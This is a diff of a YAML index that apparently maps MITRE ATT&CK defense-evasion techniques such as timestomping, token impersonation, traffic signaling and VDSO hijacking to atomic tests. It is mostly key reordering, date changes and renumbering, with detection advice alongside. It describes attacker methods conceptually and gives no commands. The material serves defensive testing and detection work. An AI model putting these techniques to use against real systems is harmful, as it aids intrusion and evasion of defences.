+ x_mitre_contributors:
+ - Brian Wiltse @evalstrings
+ - Patrick Campbell, @pjcampbe11
+ x_mitre_version: '1.2'
atomic_tests: []
T1055.003:
technique:
@@ -31760,12 +32706,16 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-02-21T22:40:58.149Z'
+ modified: '2020-06-20T22:21:29.233Z'
created: '2020-01-14T01:28:32.166Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -31778,14 +32728,10 @@ defense-evasion:
process behavior to determine if a process is performing actions it usually
does not, such as opening network connections, reading files, or other suspicious
actions that could relate to post-compromise behavior. "
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Process whitelisting
- - Anti-virus
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1055.005:
technique:
@@ -31829,12 +32775,14 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-02-21T22:41:25.118Z'
+ modified: '2020-06-20T22:23:30.093Z'
created: '2020-01-14T01:30:41.092Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -31847,12 +32795,10 @@ defense-evasion:
process behavior to determine if a process is performing actions it usually
does not, such as opening network connections, reading files, or other suspicious
actions that could relate to post-compromise behavior. "
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1497.003:
technique:
@@ -31879,17 +32825,17 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T14:14:03.875Z'
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ modified: '2020-07-01T16:32:02.532Z'
created: '2020-03-06T21:11:11.225Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_contributors:
- - Deloitte Threat Library Team
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
+ - Signature-based detection
+ - Static File Analysis
+ - Anti-virus
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -31899,39 +32845,41 @@ defense-evasion:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Host forensic analysis
- - Signature-based detection
- - Static File Analysis
- - Anti-virus
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
- T1551.006:
+ T1070.006:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1551.006
- url: https://attack.mitre.org/techniques/T1551/006
- - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
- description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
- of Anti-Forensics Techniques. Retrieved June 3, 2016.'
- source_name: WindowsIR Anti-Forensic Techniques
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Timestomp
+ created: '2020-01-31T12:42:44.103Z'
+ modified: '2020-03-29T21:39:46.724Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
description: |-
Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
- id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-29T21:39:46.724Z'
- created: '2020-01-31T12:42:44.103Z'
+ name: Timestomp
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1070.006
+ url: https://attack.mitre.org/techniques/T1070/006
+ - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+ description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+ of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+ source_name: WindowsIR Anti-Forensic Techniques
x_mitre_platforms:
- Linux
- macOS
@@ -31954,7 +32902,7 @@ defense-evasion:
x_mitre_version: '1.0'
x_mitre_contributors:
- Romain Dumont, ESET
- identifier: T1551.006
+ identifier: T1070.006
atomic_tests:
- name: Set a file's access timestamp
auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810
@@ -32170,6 +33118,23 @@ defense-evasion:
name: powershell
T1134.001:
technique:
+ created: '2020-02-18T16:39:06.289Z'
+ modified: '2020-03-26T21:29:18.608Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d
+ description: |-
+ Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.
+
+ An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.
+ name: Token Impersonation/Theft
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1134.001
@@ -32178,23 +33143,6 @@ defense-evasion:
description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved
April 21, 2017.
source_name: Microsoft Command-line Logging
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Token Impersonation/Theft
- description: |-
- Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.
-
- An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.
- id: attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-26T21:29:18.608Z'
- created: '2020-02-18T16:39:06.289Z'
x_mitre_platforms:
- Windows
x_mitre_data_sources:
@@ -32213,27 +33161,28 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
atomic_tests: []
- T1545:
+ T1205:
technique:
+ revoked: false
+ id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Traffic Signaling
+ description: |-
+ Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
+
+ Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).
+
+ The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
external_references:
- source_name: mitre-attack
- external_id: T1545
- url: https://attack.mitre.org/techniques/T1545
+ external_id: T1205
+ url: https://attack.mitre.org/techniques/T1205
- url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Traffic Signaling
- description: |-
- Adversaries may use traffic signaling to hide open ports used for persistence or command and control. Traffic signaling is a well-established method used by both defenders and adversaries to hide open ports from access/discovery. To enable a port, an adversary sends a series of packets with certain characteristics before the port will be opened. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1545/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
-
- This technique has been observed for both the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.
-
- The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
- id: attack-pattern--c2dc4e98-ce10-4af8-866f-2187e84466f4
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -32242,24 +33191,26 @@ defense-evasion:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-03-27T20:14:07.431Z'
- created: '2020-01-22T20:18:16.952Z'
+ modified: '2020-07-01T18:27:41.755Z'
+ created: '2018-04-18T17:59:24.739Z'
+ x_mitre_contributors:
+ - Josh Day, Gigamon
+ x_mitre_data_sources:
+ - Packet capture
+ - Netflow/Enclave netflow
+ x_mitre_permissions_required:
+ - User
x_mitre_platforms:
- Linux
- macOS
- x_mitre_data_sources:
- - Netflow/Enclave netflow
- - Packet capture
+ - Windows
+ x_mitre_network_requirements: true
x_mitre_detection: Record network packets sent to and from the system, looking
for extraneous packets that do not belong to established flows.
x_mitre_defense_bypassed:
- Defensive network service scanning
- x_mitre_permissions_required:
- - User
+ x_mitre_version: '2.0'
x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Josh Day, Gigamon
atomic_tests: []
T1127:
technique:
@@ -32292,7 +33243,7 @@ defense-evasion:
WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with
legitimate certificates that allow them to execute on a system and proxy execution
of malicious code through a trusted process that effectively bypasses application
- whitelisting defensive solutions.'
+ control solutions.'
name: Trusted Developer Utilities Proxy Execution
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
id: attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b
@@ -32300,26 +33251,26 @@ defense-evasion:
kill_chain_phases:
- phase_name: defense-evasion
kill_chain_name: mitre-attack
- modified: '2020-03-29T19:56:43.361Z'
+ modified: '2020-06-20T22:43:41.298Z'
created: '2017-05-31T21:31:39.262Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Windows
- x_mitre_permissions_required:
- - User
+ x_mitre_version: '1.2'
+ x_mitre_contributors:
+ - Casey Smith
+ - Matthew Demaske, Adaptforward
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ x_mitre_defense_bypassed:
+ - Application control
x_mitre_detection: |-
Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
Use process monitoring to monitor the execution and arguments of from developer utilities that may be abused. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.
- x_mitre_defense_bypassed:
- - Application whitelisting
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- x_mitre_contributors:
- - Casey Smith
- - Matthew Demaske, Adaptforward
- x_mitre_version: '1.2'
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Windows
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1535:
technique:
@@ -32352,25 +33303,26 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2019-10-22T19:56:22.024Z'
+ modified: '2020-07-14T19:17:44.563Z'
created: '2019-09-04T14:35:04.617Z'
- x_mitre_detection: 'Monitor system logs to review activities occurring across
- all cloud environments and regions. Configure alerting to notify of activity
- in normally unused regions or if the number of instances active in a region
- goes above a certain threshold.(Citation: CloudSploit - Unused AWS Regions)'
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Stackdriver logs
- - Azure activity logs
- - AWS CloudTrail logs
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Netskope
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- AWS
- GCP
- Azure
+ x_mitre_contributors:
+ - Netskope
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Stackdriver logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: 'Monitor system logs to review activities occurring across
+ all cloud environments and regions. Configure alerting to notify of activity
+ in normally unused regions or if the number of instances active in a region
+ goes above a certain threshold.(Citation: CloudSploit - Unused AWS Regions)'
atomic_tests: []
T1550:
technique:
@@ -32420,14 +33372,10 @@ defense-evasion:
phase_name: lateral-movement
modified: '2020-03-24T12:36:24.608Z'
created: '2020-01-30T16:18:36.873Z'
- x_mitre_platforms:
- - Windows
- - Office 365
- - SaaS
- x_mitre_data_sources:
- - Office 365 audit logs
- - OAuth audit logs
- - Authentication logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - System Access Controls
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
Audit Policy) Look for suspicious account behavior across systems that share
@@ -32439,10 +33387,14 @@ defense-evasion:
account. Correlate other security systems with login information (e.g., a
user has an active login session but has not entered the building or does
not have VPN access).'
- x_mitre_defense_bypassed:
- - System Access Controls
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ - OAuth audit logs
+ - Authentication logs
+ x_mitre_platforms:
+ - Windows
+ - Office 365
+ - SaaS
atomic_tests: []
T1497.002:
technique:
@@ -32488,17 +33440,17 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T14:10:32.872Z'
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ modified: '2020-07-01T16:32:02.491Z'
created: '2020-03-06T21:04:12.454Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_contributors:
- - Deloitte Threat Library Team
- x_mitre_data_sources:
- - Process command-line parameters
- - Process use of network
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Static File Analysis
+ - Signature-based detection
+ - Host forensic analysis
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -32509,32 +33461,37 @@ defense-evasion:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Static File Analysis
- - Signature-based detection
- - Host forensic analysis
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process use of network
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1055.014:
technique:
id: attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5
description: "Adversaries may inject malicious code into processes via VDSO
hijacking in order to evade process-based defenses as well as possibly elevate
- privileges. Virtual dynamic shared object (VDSO) hijacking is a method of
+ privileges. Virtual dynamic shared object (vdso) hijacking is a method of
executing arbitrary code in the address space of a separate live process.
\n\nVDSO hijacking involves redirecting calls to dynamically linked shared
- libraries mapped into all user-land processes by the kernel. An adversary
- may patch memory address references stored in a process' global offset table
- (which store absolute addresses of functions) to inject malicious code into
- a running process. This code can then be invoked by redirecting the execution
- flow of the process (ex: using custom shellcode or hijacked system calls).
- (Citation: ELF Injection May 2009) \n\nRunning code in the context of another
- process may allow access to the process's memory, system/network resources,
- and possibly elevated privileges. Execution via VDSO hijacking may also evade
- detection from security products since the execution is masked under a legitimate
- process. "
+ libraries. Memory protections may prevent writing executable code to a process
+ via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008).
+ However, an adversary may hijack the syscall interface code stubs mapped into
+ a process from the vdso shared object to execute syscalls to open and map
+ a malicious shared object. This code can then be invoked by redirecting the
+ execution flow of the process via patched memory address references stored
+ in a process' global offset table (which store absolute addresses of mapped
+ library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace
+ VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014)\n\nRunning code in
+ the context of another process may allow access to the process's memory, system/network
+ resources, and possibly elevated privileges. Execution via VDSO hijacking
+ may also evade detection from security products since the execution is masked
+ under a legitimate process. "
name: VDSO Hijacking
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -32547,6 +33504,18 @@ defense-evasion:
url: https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html
description: O'Neill, R. (2009, May). Modern Day ELF Runtime infection via
GOT poisoning. Retrieved March 15, 2020.
+ - source_name: Backtrace VDSO
+ url: https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/
+ description: backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS.
+ Retrieved June 15, 2020.
+ - source_name: VDSO Aug 2005
+ url: https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/
+ description: Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved
+ June 16, 2020.
+ - source_name: Syscall 2014
+ url: https://lwn.net/Articles/604515/
+ description: Drysdale, D. (2014, July 16). Anatomy of a system call, part
+ 2. Retrieved June 16, 2020.
- description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics:
Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved
December 20, 2017.'
@@ -32555,7 +33524,7 @@ defense-evasion:
description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved
December 20, 2017.
source_name: GNU Acct
- - url: https://access.redhat.com/documentation/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
+ - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide -
Chapter 7 - System Auditing. Retrieved December 20, 2017.
source_name: RHEL auditd
@@ -32569,16 +33538,11 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T20:58:10.186Z'
+ modified: '2020-06-20T22:28:45.232Z'
created: '2020-01-14T01:35:00.781Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_data_sources:
- - System calls
- - Process monitoring
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
and mmap, that can be used to attach to, manipulate memory, then redirect
a processes' execution path. Monitoring for Linux specific calls such as the
@@ -32589,9 +33553,13 @@ defense-evasion:
\n\nAnalyze process behavior to determine if a process is performing actions
it usually does not, such as opening network connections, reading files, or
other suspicious actions that could relate to post-compromise behavior. "
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_data_sources:
+ - System calls
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
atomic_tests: []
T1078:
technique:
@@ -32629,31 +33597,13 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:59:36.955Z'
+ modified: '2020-06-20T22:44:36.043Z'
created: '2017-05-31T21:31:00.645Z'
- x_mitre_version: '2.1'
- x_mitre_data_sources:
- - AWS CloudTrail logs
- - Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_defense_bypassed:
- - Firewall
- - Host intrusion prevention systems
- - Network intrusion detection system
- - Process whitelisting
- - System access controls
- - Anti-virus
- x_mitre_detection: |-
- Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
-
- Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_effective_permissions:
- - User
- - Administrator
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Netskope
+ - Mark Wee
+ - Praetorian
x_mitre_platforms:
- Linux
- macOS
@@ -32664,11 +33614,29 @@ defense-evasion:
- SaaS
- Office 365
- Azure AD
- x_mitre_contributors:
- - Netskope
- - Mark Wee
- - Praetorian
- x_mitre_is_subtechnique: false
+ x_mitre_effective_permissions:
+ - User
+ - Administrator
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: |-
+ Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+
+ Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
+ x_mitre_defense_bypassed:
+ - Firewall
+ - Host intrusion prevention systems
+ - Network intrusion detection system
+ - Application control
+ - System access controls
+ - Anti-virus
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
+ x_mitre_version: '2.1'
atomic_tests: []
T1497:
technique:
@@ -32706,24 +33674,11 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T14:20:15.523Z'
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ modified: '2020-07-01T16:32:02.272Z'
created: '2019-04-17T22:22:24.505Z'
- x_mitre_is_subtechnique: false
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host forensic analysis
- - Signature-based detection
- - Static File Analysis
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
+ x_mitre_version: '1.2'
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -32734,7 +33689,22 @@ defense-evasion:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
- x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host forensic analysis
+ - Signature-based detection
+ - Static File Analysis
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1550.004:
technique:
@@ -32769,21 +33739,21 @@ defense-evasion:
phase_name: lateral-movement
modified: '2020-03-24T12:36:24.501Z'
created: '2020-01-30T17:48:49.395Z'
- x_mitre_platforms:
- - Office 365
- - SaaS
- x_mitre_contributors:
- - Johann Rehberger
- x_mitre_data_sources:
- - Office 365 audit logs
- - Authentication logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_defense_bypassed:
+ - System Access Controls
x_mitre_detection: Monitor for anomalous access of websites and cloud-based
applications by the same user in different locations or by different systems
that do not match expected configurations.
- x_mitre_defense_bypassed:
- - System Access Controls
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ - Authentication logs
+ x_mitre_contributors:
+ - Johann Rehberger
+ x_mitre_platforms:
+ - Office 365
+ - SaaS
atomic_tests: []
T1222.001:
technique:
@@ -32828,23 +33798,23 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T23:07:55.953Z'
created: '2020-02-04T19:17:41.767Z'
- x_mitre_platforms:
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_detection: |-
+ Monitor and investigate attempts to modify DACLs and file/directory ownership. Many of the commands used to modify DACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
+
+ Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)
x_mitre_data_sources:
- Windows event logs
- Process command-line parameters
- Process monitoring
- File monitoring
- x_mitre_detection: |-
- Monitor and investigate attempts to modify DACLs and file/directory ownership. Many of the commands used to modify DACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
-
- Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Windows
identifier: T1222.001
atomic_tests:
- name: Take ownership using takeown utility
@@ -32935,9 +33905,9 @@ defense-evasion:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: XSL Script Processing
description: |-
- Adversaries may bypass application whitelisting and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
+ Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
